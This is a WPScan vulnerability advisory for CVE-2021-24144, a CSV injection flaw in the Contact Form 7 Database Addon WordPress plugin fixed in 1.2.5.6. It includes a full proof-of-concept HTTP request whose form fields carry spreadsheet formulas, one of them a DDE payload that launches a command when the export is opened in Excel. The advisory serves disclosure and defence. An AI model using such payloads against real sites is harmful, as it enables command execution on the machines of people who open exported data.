WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Contact Form 7 Database Addon < 1.2.5.6 - CSV Injection

Description

The plugin was prone to a vulnerability that lets remote attackers inject arbitrary formulas into CSV files. Attackers can possibly exploit this issue to execute arbitrary commands on the victim's system, by the use of Microsoft Excel DDE function, or to leak data via maliciously injected hyperlinks. Version 1.2.5.4 is vulnerable; prior versions may also be affected.

Proof of Concept

POST /wp-json/contact-form-7/v1/contact-forms/219/feedback HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------127233189811167375871189751352
Content-Length: 1339
Origin: http://example.com
Connection: close

-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="_wpcf7"

219
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="_wpcf7_version"

5.3.2
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="_wpcf7_locale"

en_US
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="_wpcf7_unit_tag"

wpcf7-f219-p1-o1
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="_wpcf7_container_post"

1
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="_wpcf7_posted_data_hash"


-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="your-name"

=SUM(1+2)
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="your-email"

[email protected]
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="your-subject"

=1+1
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="your-message"

;=2+5+cmd|' /C calc'!A1
-----------------------------127233189811167375871189751352--
 

Affects Plugins

contact-form-cfdb7
Fixed in version 1.2.5.6

References

CVE
CVE-2021-24144
URL
https://plugins.trac.wordpress.org/changeset/2460800

Classification

Type

CSV INJECTION

OWASP top 10
A1: Injection
CWE
CWE-1236

Miscellaneous

Original Researcher

SunCSR-thiennv

Submitter

thiennv

Verified

Yes

WPVDB ID
143cdaff-c536-4ff9-8d64-c617511ddd48

Timeline

Publicly Published

2021-01-25 (about 1 years ago)

Added

2021-01-25 (about 1 years ago)

Last Updated

2021-01-29 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us